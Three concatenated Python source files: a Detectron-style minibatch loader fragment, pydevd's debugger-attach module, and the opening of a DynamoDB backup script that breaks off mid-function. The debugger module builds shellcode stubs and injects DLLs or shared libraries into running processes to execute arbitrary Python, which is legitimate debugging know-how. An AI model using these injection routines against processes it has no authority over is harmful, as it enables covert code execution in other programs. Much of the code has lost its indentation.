# Blobs must be queued in the order specified by
# self.get_output_names
ordered_blobs = OrderedDict()
for key in self.get_output_names():
assert blobs[key].dtype in (np.int32, np.float32), \
'Blob {} of dtype {} must have dtype of ' \
'np.int32 or np.float32'.format(key, blobs[key].dtype)
ordered_blobs[key] = blobs[key]
coordinated_put(
self.coordinator, self._minibatch_queue, ordered_blobs
)
logger.info('Stopping mini-batch loading thread')
def enqueue_blobs_thread(self, gpu_id, blob_names):
"""Transfer mini-batches from a mini-batch queue to a BlobsQueue."""
with self.coordinator.stop_on_exception():
while not self.coordinator.should_stop():
if self._minibatch_queue.qsize() == 0:
logger.warning('Mini-batch queue is empty')
blobs = coordinated_get(self.coordinator, self._minibatch_queue)
self.enqueue_blobs(gpu_id, blob_names, blobs.values())
logger.debug(
'batch queue size {}'.format(self._minibatch_queue.qsize())
)
logger.info('Stopping enqueue thread')
def get_next_minibatch(self):
"""Return the blobs to be used for the next minibatch. Thread safe."""
valid = False
while not valid:
db_inds = self._get_next_minibatch_inds()
minibatch_db = [self._roidb[i] for i in db_inds]
blobs, valid = get_minibatch(minibatch_db)
# img = np.asarray([blobs['data'][0][2], blobs['data'][0][1], blobs['data'][0][0]]).astype('uint8')[0]
# matrix = blobs['im_tr_matrix']
# scale = blobs['im_info'][0][2]
# for gt_roi in minibatch_db[0]['boxes']:
# w, h = gt_roi[2] - gt_roi[0], gt_roi[3] - gt_roi[1]
# nw, nh = int(w * scale), int(h * scale)
# center_x, center_y = gt_roi[0] + w / 2, gt_roi[1] + h / 2
# new_center = np.dot(matrix, [[center_x], [center_y], [1.0]]).astype('int')
# new_center_x = int(new_center[0][0])
# new_center_y = int(new_center[1][0])
# nbx = int(new_center_x - nw / 2)
# nby = int(new_center_y - nh / 2)
# nbx2 = int(nbx + nw)
# nby2 = int(nby + nh)
# cv2.rectangle(img, (nbx, nby), (nbx2, nby2), (255, 0, 0), 2)
# #gt_rois.append([nbx, nby, nbx2, nby2])
# if cv2.imwrite(os.path.join(cfg.OUTPUT_DIR, str(minibatch_db[0]['id'])+'.png'), img):
# printed = 1
# else:
# printed = 0
pass
return blobs
def _shuffle_roidb_inds(self):
"""Randomly permute the training roidb. Not thread safe."""
if cfg.TRAIN.ASPECT_GROUPING:
widths = np.array([r['width'] for r in self._roidb])
heights = np.array([r['height'] for r in self._roidb])
horz = (widths >= heights)
vert = np.logical_not(horz)
horz_inds = np.where(horz)[0]
vert_inds = np.where(vert)[0]
horz_inds = np.random.permutation(horz_inds)
vert_inds = np.random.permutation(vert_inds)
mb = cfg.TRAIN.IMS_PER_BATCH
horz_inds = horz_inds[:(len(horz_inds) // mb) * mb]
vert_inds = vert_inds[:(len(vert_inds) // mb) * mb]
inds = np.hstack((horz_inds, vert_inds))
inds = np.reshape(inds, (-1, mb))
row_perm = np.random.permutation(np.arange(inds.shape[0]))
inds = np.reshape(inds[row_perm, :], (-1, ))
self._perm = inds
else:
self._perm = np.random.permutation(np.arange(len(self._roidb)))
self._perm = deque(self._perm)
self._cur = 0
def _get_next_minibatch_inds(self):
"""Return the roidb indices for the next minibatch. Thread safe."""
with self._lock:
# We use a deque and always take the *first* IMS_PER_BATCH items
# followed by *rotating* the deque so that we see fresh items
# each time. If the length of _perm is not divisible by
# IMS_PER_BATCH, then we end up wrapping around the permutation.
db_inds = [self._perm[i] for i in range(cfg.TRAIN.IMS_PER_BATCH)]
self._perm.rotate(-cfg.TRAIN.IMS_PER_BATCH)
self._cur += cfg.TRAIN.IMS_PER_BATCH
if self._cur >= len(self._perm):
self._shuffle_roidb_inds()
return db_inds
def get_output_names(self):
return self._output_names
def enqueue_blobs(self, gpu_id, blob_names, blobs):
"""Put a mini-batch on a BlobsQueue."""
assert len(blob_names) == len(blobs)
t = time.time()
dev = c2_utils.CudaDevice(gpu_id)
queue_name = 'gpu_{}/{}'.format(gpu_id, self._blobs_queue_name)
blob_names = ['gpu_{}/{}'.format(gpu_id, b) for b in blob_names]
for (blob_name, blob) in zip(blob_names, blobs):
workspace.FeedBlob(blob_name, blob, device_option=dev)
logger.debug(
'enqueue_blobs {}: workspace.FeedBlob: {}'.
format(gpu_id, time.time() - t)
)
t = time.time()
op = core.CreateOperator(
'SafeEnqueueBlobs', [queue_name] + blob_names,
blob_names + [queue_name + '_enqueue_status'],
device_option=dev
)
workspace.RunOperatorOnce(op)
logger.debug(
'enqueue_blobs {}: workspace.RunOperatorOnce: {}'.
format(gpu_id, time.time() - t)
)
def create_threads(self):
# Create mini-batch loader threads, each of which builds mini-batches
# and places them into a queue in CPU memory
self._workers = [
threading.Thread(target=self.minibatch_loader_thread)
for _ in range(self._num_loaders)
]
# Create one BlobsQueue per GPU
# (enqueue_blob_names are unscoped)
enqueue_blob_names = self.create_blobs_queues()
# Create one enqueuer thread per GPU
self._enqueuers = [
threading.Thread(
target=self.enqueue_blobs_thread,
args=(gpu_id, enqueue_blob_names)
) for gpu_id in range(self._num_gpus)
]
def start(self, prefill=False):
for w in self._workers + self._enqueuers:
w.setDaemon(True)
w.start()
if prefill:
logger.info('Pre-filling mini-batch queue...')
while not self._minibatch_queue.full():
logger.info(
' [{:d}/{:d}]'.format(
self._minibatch_queue.qsize(),
self._minibatch_queue.maxsize
)
)
time.sleep(0.1)
# Detect failure and shutdown
if self.coordinator.should_stop():
self.shutdown()
break
def has_stopped(self):
return self.coordinator.should_stop()
def shutdown(self):
self.coordinator.request_stop()
self.coordinator.wait_for_stop()
self.close_blobs_queues()
for w in self._workers + self._enqueuers:
w.join()
def create_blobs_queues(self):
"""Create one BlobsQueue for each GPU to hold mini-batches."""
for gpu_id in range(self._num_gpus):
with c2_utils.GpuNameScope(gpu_id):
workspace.RunOperatorOnce(
core.CreateOperator(
'CreateBlobsQueue', [], [self._blobs_queue_name],
num_blobs=len(self.get_output_names()),
capacity=self._blobs_queue_capacity
)
)
return self.create_enqueue_blobs()
def close_blobs_queues(self):
"""Close a BlobsQueue."""
for gpu_id in range(self._num_gpus):
with core.NameScope('gpu_{}'.format(gpu_id)):
workspace.RunOperatorOnce(
core.CreateOperator(
'CloseBlobsQueue', [self._blobs_queue_name], []
)
)
def create_enqueue_blobs(self):
blob_names = self.get_output_names()
enqueue_blob_names = [
'{}_enqueue_{}'.format(b, self._loader_id) for b in blob_names
]
for gpu_id in range(self._num_gpus):
with c2_utils.NamedCudaScope(gpu_id):
for blob in enqueue_blob_names:
workspace.CreateBlob(core.ScopedName(blob))
return enqueue_blob_names
def register_sigint_handler(self):
def signal_handler(signal, frame):
logger.info(
'SIGINT: Shutting down RoIDataLoader threads and exiting...'
)
self.shutdown()
signal.signal(signal.SIGINT, signal_handler)
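# Illustrative sketch (an assumption, not part of the original Detectron module):
# a minimal, framework-free version of the producer/consumer layout described in
# the module docstring -- loader threads fill a bounded minibatch queue and
# per-GPU enqueue threads drain it. Names such as _example_loader_pattern and the
# fake "minibatch" dicts are hypothetical and exist only for illustration.
def _example_loader_pattern(num_loaders=2, num_consumers=2, num_items=8):
    minibatch_queue = Queue.Queue(maxsize=4)
    stop_event = threading.Event()
    consumed = []

    def loader_thread(loader_id):
        for i in range(num_items):
            # In the real loader this would be get_minibatch(...).
            minibatch_queue.put({'loader': loader_id, 'index': i})

    def consumer_thread():
        # Keep draining until the loaders are done and the queue is empty.
        while not stop_event.is_set() or not minibatch_queue.empty():
            try:
                consumed.append(minibatch_queue.get(timeout=0.1))
            except Queue.Empty:
                continue

    loaders = [threading.Thread(target=loader_thread, args=(i,)) for i in range(num_loaders)]
    consumers = [threading.Thread(target=consumer_thread) for _ in range(num_consumers)]
    for t in loaders + consumers:
        t.start()
    for t in loaders:
        t.join()
    stop_event.set()
    for t in consumers:
        t.join()
    return len(consumed)  # equals num_loaders * num_items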
|
add_code_to_python_process.py
|
r'''
Copyright: Brainwy Software Ltda.
License: EPL.
=============
Works for Windows relying on a fork of winappdbg which works in py2/3 (at least for the part we're interested in).
See: https://github.com/fabioz/winappdbg (py3 branch).
Note that the official branch for winappdbg is: https://github.com/MarioVilas/winappdbg, which should be used when it works in Py3.
A private copy is added here to make deployment easier, but changes should always be done upstream first.
Works for Linux relying on gdb.
Limitations:
============
Linux:
------
1. It is possible that ptrace is disabled: /etc/sysctl.d/10-ptrace.conf
Note that even enabling it in /etc/sysctl.d/10-ptrace.conf (i.e.: making the
ptrace_scope=0), it's possible that we need to run the application that'll use ptrace (or
gdb in this case) as root (so, we must sudo the python which'll run this module).
2. It currently doesn't work in debug builds (i.e.: python_d)
Other implementations:
- pyrasite.com:
GPL
Windows/linux (in Linux it also uses gdb to connect -- although specifics are different as we use a dll to execute
code with other threads stopped). Its Windows approach is more limited because it doesn't seem to deal properly with
Python 3 if threading is disabled.
- https://github.com/google/pyringe:
Apache v2.
Only linux/Python 2.
- http://pytools.codeplex.com:
Apache V2
Windows Only (but supports mixed mode debugging)
Our own code relies heavily on a part of it: http://pytools.codeplex.com/SourceControl/latest#Python/Product/PyDebugAttach/PyDebugAttach.cpp
to overcome some limitations of attaching and running code in the target python executable on Python 3.
See: attach.cpp
Linux: References if we wanted to use a pure-python debugger:
https://bitbucket.org/haypo/python-ptrace/
http://stackoverflow.com/questions/7841573/how-to-get-an-error-message-for-errno-value-in-python
Jugaad:
https://www.defcon.org/images/defcon-19/dc-19-presentations/Jakhar/DEFCON-19-Jakhar-Jugaad-Linux-Thread-Injection.pdf
https://github.com/aseemjakhar/jugaad
Something else (general and not Python related):
- http://www.codeproject.com/Articles/4610/Three-Ways-to-Inject-Your-Code-into-Another-Proces
Other references:
- https://github.com/haypo/faulthandler
- http://nedbatchelder.com/text/trace-function.html
- https://github.com/python-git/python/blob/master/Python/sysmodule.c (sys_settrace)
- https://github.com/python-git/python/blob/master/Python/ceval.c (PyEval_SetTrace)
- https://github.com/python-git/python/blob/master/Python/thread.c (PyThread_get_key_value)
To build the dlls needed on windows, visual studio express 13 was used (see compile_dll.bat)
See: attach_pydevd.py to attach the pydev debugger to a running python process.
'''
# Note: to work with nasm compiling asm to code and decompiling to see asm with shellcode:
# x:\nasm\nasm-2.07-win32\nasm-2.07\nasm.exe
# nasm.asm&x:\nasm\nasm-2.07-win32\nasm-2.07\ndisasm.exe -b arch nasm
import ctypes
import os
import struct
import subprocess
import sys
import time
class AutoExit(object):
def __init__(self, on_exit):
self.on_exit = on_exit
def __enter__(self):
pass
def __exit__(self, *args):
self.on_exit()
class GenShellCodeHelper(object):
def __init__(self, is_64):
from winappdbg import compat
self.is_64 = is_64
self._code = []
if not is_64:
self._translations = {
'push esi': b'\x56',
'push eax': b'\x50',
'push ebp': b'\x55',
'push ebx': b'\x53',
'pop esi': b'\x5E',
'pop eax': b'\x58',
'pop ebp': b'\x5D',
'pop ebx': b'\x5B',
'mov esi': b'\xBE',
'mov eax': b'\xB8',
'mov ebp': b'\xBD',
'mov ebx': b'\xBB',
'call ebp': b'\xFF\xD5',
'call eax': b'\xFF\xD0',
'call ebx': b'\xFF\xD3',
'mov ebx,eax': b'\x89\xC3',
'mov eax,ebx': b'\x89\xD8',
'mov ebp,esp': b'\x89\xE5',
'mov esp,ebp': b'\x89\xEC',
'push dword': b'\x68',
'mov ebp,eax': b'\x89\xC5',
'mov eax,ebp': b'\x89\xE8',
'ret': b'\xc3',
}
else:
# Translate 64 bits
self._translations = {
'push rsi': b'\x56',
'push rax': b'\x50',
'push rbp': b'\x55',
'push rbx': b'\x53',
'push rsp': b'\x54',
'push rdi': b'\x57',
'pop rsi': b'\x5E',
'pop rax': b'\x58',
'pop rbp': b'\x5D',
'pop rbx': b'\x5B',
'pop rsp': b'\x5C',
'pop rdi': b'\x5F',
'mov rsi': b'\x48\xBE',
'mov rax': b'\x48\xB8',
'mov rbp': b'\x48\xBD',
'mov rbx': b'\x48\xBB',
'mov rdi': b'\x48\xBF',
'mov rcx': b'\x48\xB9',
'mov rdx': b'\x48\xBA',
'call rbp': b'\xFF\xD5',
'call rax': b'\xFF\xD0',
'call rbx': b'\xFF\xD3',
'mov rbx,rax': b'\x48\x89\xC3',
'mov rax,rbx': b'\x48\x89\xD8',
'mov rbp,rsp': b'\x48\x89\xE5',
'mov rsp,rbp': b'\x48\x89\xEC',
'mov rcx,rbp': b'\x48\x89\xE9',
'mov rbp,rax': b'\x48\x89\xC5',
'mov rax,rbp': b'\x48\x89\xE8',
'mov rdi,rbp': b'\x48\x89\xEF',
'ret': b'\xc3',
}
def push_addr(self, addr):
self._code.append(self.translate('push dword'))
self._code.append(addr)
def push(self, register):
self._code.append(self.translate('push %s' % register))
return AutoExit(lambda: self.pop(register))
def pop(self, register):
self._code.append(self.translate('pop %s' % register))
def mov_to_register_addr(self, register, addr):
self._code.append(self.translate('mov %s' % register))
self._code.append(addr)
def mov_register_to_from(self, register_to, register_from):
self._code.append(self.translate('mov %s,%s' % (register_to, register_from)))
def call(self, register):
self._code.append(self.translate('call %s' % register))
def preserve_stack(self):
self.mov_register_to_from('ebp', 'esp')
return AutoExit(lambda: self.restore_stack())
def restore_stack(self):
self.mov_register_to_from('esp', 'ebp')
def ret(self):
self._code.append(self.translate('ret'))
def get_code(self):
return b''.join(self._code)
def translate(self, code):
return self._translations[code]
def pack_address(self, address):
if self.is_64:
return struct.pack('<q', address)
else:
return struct.pack('<L', address)
def convert(self, code):
'''
Note:
If the shellcode starts with '66' controls, it needs to be changed to add [BITS 32] or
[BITS 64] to the start.
To use:
convert("""
55
53
50
BDE97F071E
FFD5
BDD67B071E
FFD5
5D
5B
58
C3
""")
'''
code = code.replace(' ', '')
lines = []
for l in code.splitlines(False):
lines.append(l)
code = ''.join(lines) # Remove new lines
        import binascii
        return binascii.unhexlify(code)  # py2/py3-compatible equivalent of code.decode('hex')
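# Illustrative sketch only (not called anywhere in this module): how GenShellCodeHelper
# is meant to be composed into a tiny "call one function and return" stub. The address
# below is a hypothetical placeholder, not a real value.
def _example_gen_shellcode_sketch():
    helper = GenShellCodeHelper(is_64=False)
    fake_func_addr = 0x1E077FE9  # hypothetical address of the function to call in the target
    with helper.push('eax'):  # registers pushed via the context manager are popped automatically
        with helper.push('ebx'):
            helper.mov_to_register_addr('ebx', helper.pack_address(fake_func_addr))
            helper.call('ebx')
    helper.ret()
    return helper.get_code()  # raw bytes suitable for process.inject_code()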
def resolve_label(process, label):
max_attempts = 10
for i in range(max_attempts):
try:
address = process.resolve_label(label)
if not address:
raise AssertionError('%s not resolved.' % (label,))
return address
except:
try:
process.scan_modules()
except:
pass
if i == max_attempts - 1:
raise
# At most 4 seconds to resolve it.
time.sleep(4. / max_attempts)
def is_python_64bit():
return (struct.calcsize('P') == 8)
def is_mac():
import platform
return platform.system() == 'Darwin'
def run_python_code_windows(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
from winappdbg.process import Process
if not isinstance(python_code, bytes):
python_code = python_code.encode('utf-8')
process = Process(pid)
bits = process.get_bits()
is_64 = bits == 64
if is_64 != is_python_64bit():
raise RuntimeError("The architecture of the Python used to connect doesn't match the architecture of the target.\n"
"Target 64 bits: %s\n"
"Current Python 64 bits: %s" % (is_64, is_python_64bit()))
print('Connecting to %s bits target' % (bits,))
assert resolve_label(process, b'PyGILState_Ensure')
filedir = os.path.dirname(__file__)
if is_64:
suffix = 'amd64'
else:
suffix = 'x86'
target_dll = os.path.join(filedir, 'attach_%s.dll' % suffix)
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
print('Injecting dll')
process.inject_dll(target_dll.encode('mbcs'))
print('Dll injected')
process.scan_modules()
attach_func = resolve_label(process, b'AttachAndRunPythonCode')
assert attach_func
print('Allocating code in target process')
assert isinstance(python_code, bytes)
code_address = process.malloc(len(python_code))
assert code_address
print('Writing code in target process')
process.write(code_address, python_code)
print('Allocating return value memory in target process')
attach_info_address = process.malloc(ctypes.sizeof(ctypes.c_int))
assert attach_info_address
CONNECT_DEBUGGER = 2
attach_info = 0
if show_debug_info:
SHOW_DEBUG_INFO = 1
attach_info |= SHOW_DEBUG_INFO # Uncomment to show debug info
if connect_debugger_tracing:
attach_info |= CONNECT_DEBUGGER
# Note: previously the attach_info address was treated as read/write to have the return
# value, but it seems that sometimes when the program wrote back the memory became
# unreadable with the stack trace below when trying to read, so, we just write and
# no longer inspect the return value.
# i.e.:
# Traceback (most recent call last):
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\attach_pydevd.py", line 72, in <module>
# main(process_command_line(sys.argv[1:]))
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\attach_pydevd.py", line 68, in main
# setup['pid'], python_code, connect_debugger_tracing=True, show_debug_info=show_debug_info_on_target_process)
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\add_code_to_python_process.py", line 392, in run_python_code_windows
# return_code = process.read_int(return_code_address)
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\winappdbg\process.py", line 1673, in read_int
# return self.__read_c_type(lpBaseAddress, b'@l', ctypes.c_int)
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\winappdbg\process.py", line 1568, in __read_c_type
# packed = self.read(address, size)
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\winappdbg\process.py", line 1598, in read
# if not self.is_buffer(lpBaseAddress, nSize):
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\winappdbg\process.py", line 2843, in is_buffer
# mbi = self.mquery(address)
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\winappdbg\process.py", line 2533, in mquery
# return win32.VirtualQueryEx(hProcess, lpAddress)
# File "X:\pydev\plugins\org.python.pydev.core\pysrc\pydevd_attach_to_process\winappdbg\win32\kernel32.py", line 3742, in VirtualQueryEx
# raise ctypes.WinError()
# PermissionError: [WinError 5] Access is denied.
# Process finished with exitValue: 1
process.write_int(attach_info_address, attach_info)
helper = GenShellCodeHelper(is_64)
if is_64:
# Interesting read: http://msdn.microsoft.com/en-us/library/ms235286.aspx
# Overview of x64 Calling Conventions (for windows: Linux is different!)
# Register Usage: http://msdn.microsoft.com/en-us/library/9z1stfyw.aspx
# The registers RAX, RCX, RDX, R8, R9, R10, R11 are considered volatile and must be considered destroyed on function calls (unless otherwise safety-provable by analysis such as whole program optimization).
#
# The registers RBX, RBP, RDI, RSI, RSP, R12, R13, R14, and R15 are considered nonvolatile and must be saved and restored by a function that uses them.
#
# Important: RCX: first int argument
with helper.push('rdi'): # This one REALLY must be pushed/poped
with helper.push('rsp'):
with helper.push('rbp'):
with helper.push('rbx'):
with helper.push('rdi'): # Note: pop is automatic.
helper.mov_to_register_addr('rcx', helper.pack_address(code_address))
helper.mov_to_register_addr('rdx', helper.pack_address(attach_info_address))
helper.mov_to_register_addr('rbx', helper.pack_address(attach_func))
helper.call('rbx')
else:
with helper.push('eax'): # Note: pop is automatic.
with helper.push('ebp'):
with helper.push('ebx'):
with helper.preserve_stack():
# Put our code as a parameter in the stack (on x86, we push parameters to
# the stack)
helper.push_addr(helper.pack_address(attach_info_address))
helper.push_addr(helper.pack_address(code_address))
helper.mov_to_register_addr('ebx', helper.pack_address(attach_func))
helper.call('ebx')
helper.ret()
code = helper.get_code()
# Uncomment to see the disassembled version of what we just did...
# with open('f.asm', 'wb') as stream:
# stream.write(code)
#
# exe = r'x:\nasm\nasm-2.07-win32\nasm-2.07\ndisasm.exe'
# if is_64:
# arch = '64'
# else:
# arch = '32'
#
# subprocess.call((exe + ' -b %s f.asm' % arch).split())
print('Injecting code to target process')
thread, _thread_address = process.inject_code(code, 0)
timeout = None # Could receive timeout in millis.
print('Waiting for code to complete')
thread.wait(timeout)
# return_code = process.read_int(attach_info_address)
# if return_code == 0:
# print('Attach finished successfully.')
# else:
# print('Error when injecting code in target process. Error code: %s (on windows)' % (return_code,))
process.free(thread.pInjectedMemory)
process.free(code_address)
process.free(attach_info_address)
return 0
def run_python_code_linux(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
filedir = os.path.dirname(__file__)
# Valid arguments for arch are i386, i386:x86-64, i386:x64-32, i8086,
# i386:intel, i386:x86-64:intel, i386:x64-32:intel, i386:nacl,
# i386:x86-64:nacl, i386:x64-32:nacl, auto.
if is_python_64bit():
suffix = 'amd64'
arch = 'i386:x86-64'
else:
suffix = 'x86'
arch = 'i386'
print('Attaching with arch: %s' % (arch,))
target_dll = os.path.join(filedir, 'attach_linux_%s.so' % suffix)
target_dll = os.path.abspath(os.path.normpath(target_dll))
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
# Note: we currently don't support debug builds
is_debug = 0
# Note that the space in the beginning of each line in the multi-line is important!
cmd = [
'gdb',
'--nw', # no gui interface
'--nh', # no ~/.gdbinit
'--nx', # no .gdbinit
# '--quiet', # no version number on startup
'--pid',
str(pid),
'--batch',
# '--batch-silent',
]
cmd.extend(["--eval-command='set scheduler-locking off'"]) # If on we'll deadlock.
cmd.extend(["--eval-command='set architecture %s'" % arch])
cmd.extend([
"--eval-command='call (void*)dlopen(\"%s\", 2)'" % target_dll,
"--eval-command='call (int)DoAttach(%s, \"%s\", %s)'" % (
is_debug, python_code, show_debug_info)
])
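    # The assembled command is roughly (paths and values vary):
    #   gdb --nw --nh --nx --pid <pid> --batch
    #       --eval-command='set scheduler-locking off'
    #       --eval-command='set architecture <arch>'
    #       --eval-command='call (void*)dlopen("<attach_linux_*.so>", 2)'
    #       --eval-command='call (int)DoAttach(<is_debug>, "<python_code>", <show_debug_info>)'
    # i.e. gdb attaches to the target, dlopen()s the helper library inside it and then calls
    # its DoAttach entry point with the code to run.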
# print ' '.join(cmd)
env = os.environ.copy()
# Remove the PYTHONPATH (if gdb has a builtin Python it could fail if we
# have the PYTHONPATH for a different python version or some forced encoding).
env.pop('PYTHONIOENCODING', None)
env.pop('PYTHONPATH', None)
print('Running: %s' % (' '.join(cmd)))
p = subprocess.Popen(
' '.join(cmd),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
print('Running gdb in target process.')
out, err = p.communicate()
print('stdout: %s' % (out,))
print('stderr: %s' % (err,))
return out, err
def find_helper_script(filedir, script_name):
target_filename = os.path.join(filedir, 'linux_and_mac', script_name)
target_filename = os.path.normpath(target_filename)
if not os.path.exists(target_filename):
raise RuntimeError('Could not find helper script: %s' % target_filename)
return target_filename
def run_python_code_mac(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
filedir = os.path.dirname(__file__)
# Valid arguments for arch are i386, i386:x86-64, i386:x64-32, i8086,
# i386:intel, i386:x86-64:intel, i386:x64-32:intel, i386:nacl,
# i386:x86-64:nacl, i386:x64-32:nacl, auto.
if is_python_64bit():
suffix = 'x86_64.dylib'
arch = 'i386:x86-64'
else:
suffix = 'x86.dylib'
arch = 'i386'
print('Attaching with arch: %s' % (arch,))
target_dll = os.path.join(filedir, 'attach_%s' % suffix)
target_dll = os.path.normpath(target_dll)
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
lldb_prepare_file = find_helper_script(filedir, 'lldb_prepare.py')
# Note: we currently don't support debug builds
is_debug = 0
# Note that the space in the beginning of each line in the multi-line is important!
cmd = [
'lldb',
'--no-lldbinit', # Do not automatically parse any '.lldbinit' files.
# '--attach-pid',
# str(pid),
# '--arch',
# arch,
'--script-language',
'Python'
# '--batch-silent',
]
cmd.extend([
"-o 'process attach --pid %d'" % pid,
"-o 'command script import \"%s\"'" % (lldb_prepare_file,),
"-o 'load_lib_and_attach \"%s\" %s \"%s\" %s'" % (target_dll,
is_debug, python_code, show_debug_info),
])
cmd.extend([
"-o 'process detach'",
"-o 'script import os; os._exit(1)'",
])
# print ' '.join(cmd)
env = os.environ.copy()
# Remove the PYTHONPATH (if gdb has a builtin Python it could fail if we
# have the PYTHONPATH for a different python version or some forced encoding).
env.pop('PYTHONIOENCODING', None)
env.pop('PYTHONPATH', None)
print('Running: %s' % (' '.join(cmd)))
p = subprocess.Popen(
' '.join(cmd),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
print('Running lldb in target process.')
out, err = p.communicate()
print('stdout: %s' % (out,))
print('stderr: %s' % (err,))
return out, err
if sys.platform == 'win32':
run_python_code = run_python_code_windows
elif is_mac():
run_python_code = run_python_code_mac
else:
run_python_code = run_python_code_linux
def test():
print('Running with: %s' % (sys.executable,))
code = '''
import os, time, sys
print(os.getpid())
#from threading import Thread
#Thread(target=str).start()
if __name__ == '__main__':
while True:
time.sleep(.5)
sys.stdout.write('.\\n')
sys.stdout.flush()
'''
p = subprocess.Popen([sys.executable, '-u', '-c', code])
try:
code = 'print("It worked!")\n'
# Real code will be something as:
# code = '''import sys;sys.path.append(r'X:\winappdbg-code\examples'); import imported;'''
run_python_code(p.pid, python_code=code)
time.sleep(3)
finally:
p.kill()
def main(args):
# Otherwise, assume the first parameter is the pid and anything else is code to be executed
# in the target process.
pid = int(args[0])
del args[0]
python_code = ';'.join(args)
# Note: on Linux the python code may not have a single quote char: '
run_python_code(pid, python_code)
if __name__ == '__main__':
args = sys.argv[1:]
if not args:
print('Expected pid and Python code to execute in target process.')
else:
if '--test' == args[0]:
test()
else:
main(args)
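# Example invocation (the pid 1234 is hypothetical):
#   python add_code_to_python_process.py 1234 "import os" "print(os.getpid())"
# Everything after the pid is joined with ';' and executed inside the target process
# (see main() above); remember that single quotes are not allowed in the injected code.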
|
dynamodump.py
|
#!/usr/bin/env python
"""
Simple backup and restore script for Amazon DynamoDB using boto to work similarly to mysqldump.
Suitable for DynamoDB usages of smaller data volume which do not warrant the usage of AWS
Data Pipeline for backup/restores/empty.
dynamodump supports local DynamoDB instances as well (tested with dynalite).
"""
import argparse
import fnmatch
import json
import logging
import os
import shutil
import threading
import datetime
import errno
import sys
import time
import re
import zipfile
import tarfile
try:
from queue import Queue
except ImportError:
from Queue import Queue
try:
from urllib.request import urlopen
from urllib.error import URLError, HTTPError
except ImportError:
from urllib2 import urlopen, URLError, HTTPError
import boto.dynamodb2.layer1
from boto.dynamodb2.exceptions import ProvisionedThroughputExceededException
import botocore
import boto3
JSON_INDENT = 2
AWS_SLEEP_INTERVAL = 10 # seconds
LOCAL_SLEEP_INTERVAL = 1 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
MAX_BATCH_WRITE = 25 # DynamoDB limit
SCHEMA_FILE = "schema.json"
DATA_DIR = "data"
MAX_RETRY = 6
LOCAL_REGION = "local"
LOG_LEVEL = "INFO"
DATA_DUMP = "dump"
RESTORE_WRITE_CAPACITY = 25
THREAD_START_DELAY = 1 # seconds
CURRENT_WORKING_DIR = os.getcwd()
DEFAULT_PREFIX_SEPARATOR = "-"
MAX_NUMBER_BACKUP_WORKERS = 25
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
def _get_aws_client(profile, region, service):
"""
Build connection to some AWS service.
"""
if region:
aws_region = region
else:
aws_region = os.getenv("AWS_DEFAULT_REGION")
# Fallback to querying metadata for region
if not aws_region:
try:
azone = urlopen(METADATA_URL + "placement/availability-zone",
data=None, timeout=5).read().decode()
aws_region = azone[:-1]
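            # e.g. availability zone "us-east-1a" -> region "us-east-1": drop the trailing zone letter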
except URLError:
logging.exception("Timed out connecting to metadata service.\n\n")
sys.exit(1)
except HTTPError as e:
logging.exception("Error determining region used for AWS client. Typo in code?\n\n" +
str(e))
sys.exit(1)
if profile:
session = boto3.Session(profile_name=profile)
client = session.client(service, region_name=aws_region)
else:
client = boto3.client(service, region_name=aws_region)
return client
def get_table_name_by_tag(profile, region, tag):
"""
Using provided connection to dynamodb and tag, get all tables that have provided tag
Profile provided and, if needed, used to build connection to STS.
"""
matching_tables = []
all_tables = []
sts = _get_aws_client(profile, region, "sts")
dynamo = _get_aws_client(profile, region, "dynamodb")
account_number = sts.get_caller_identity().get("Account")
paginator = dynamo.get_paginator("list_tables")
tag_key = tag.split("=")[0]
tag_value = tag.split("=")[1]
get_all_tables = paginator.paginate()
for page in get_all_tables:
for table in page["TableNames"]:
all_tables.append(table)
logging.debug("Found table " + table)
for table in all_tables:
table_arn = "arn:aws:dynamodb:{}:{}:table/{}".format(region, account_number, table)
table_tags = dynamo.list_tags_of_resource(
ResourceArn=table_arn
)
for found_tag in table_tags["Tags"]:
if found_tag["Key"] == tag_key:
logging.debug("Checking table " + table + " tag " + found_tag["Key"])
if found_tag["Value"] == tag_value:
matching_tables.append(table)
logging.info("Matched table " + table)
return matching_tables
def do_put_bucket_object(profile, region, bucket, bucket_object):
"""
Put object into bucket. Only called if we've also created an archive file with do_archive()
Bucket must exist prior to running this function.
profile could be None.
bucket_object is file to be uploaded
"""
s3 = _get_aws_client(profile, region, "s3")
logging.info("Uploading backup to S3 bucket " + bucket)
try:
s3.upload_file(bucket_object, bucket, bucket_object,
ExtraArgs={
"ServerSideEncryption": "AES256"
})
except botocore.exceptions.ClientError as e:
logging.exception("Failed to put file to S3 bucket\n\n" + str(e))
sys.exit(1)
def do_get_s3_archive(profile, region, bucket, table, archive):
"""
Fetch latest file named filename from S3
Bucket must exist prior to running this function.
filename is args.dumpPath. File would be "args.dumpPath" with suffix .tar.bz2 or .zip
"""
s3 = _get_aws_client(profile, region, "s3")
if archive:
if archive == "tar":
archive_type = "tar.bz2"
else:
archive_type = "zip"
# Make sure bucket exists before continuing
try:
s3.head_bucket(
Bucket=bucket
)
except botocore.exceptions.ClientError as e:
logging.exception("S3 bucket " + bucket + " does not exist. "
"Can't get backup file\n\n" + str(e))
sys.exit(1)
try:
